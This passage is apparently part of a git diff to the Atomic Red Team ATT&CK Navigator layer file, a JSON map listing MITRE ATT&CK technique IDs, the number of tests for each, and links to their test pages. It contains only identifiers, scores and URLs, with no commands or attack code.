Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":51,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View 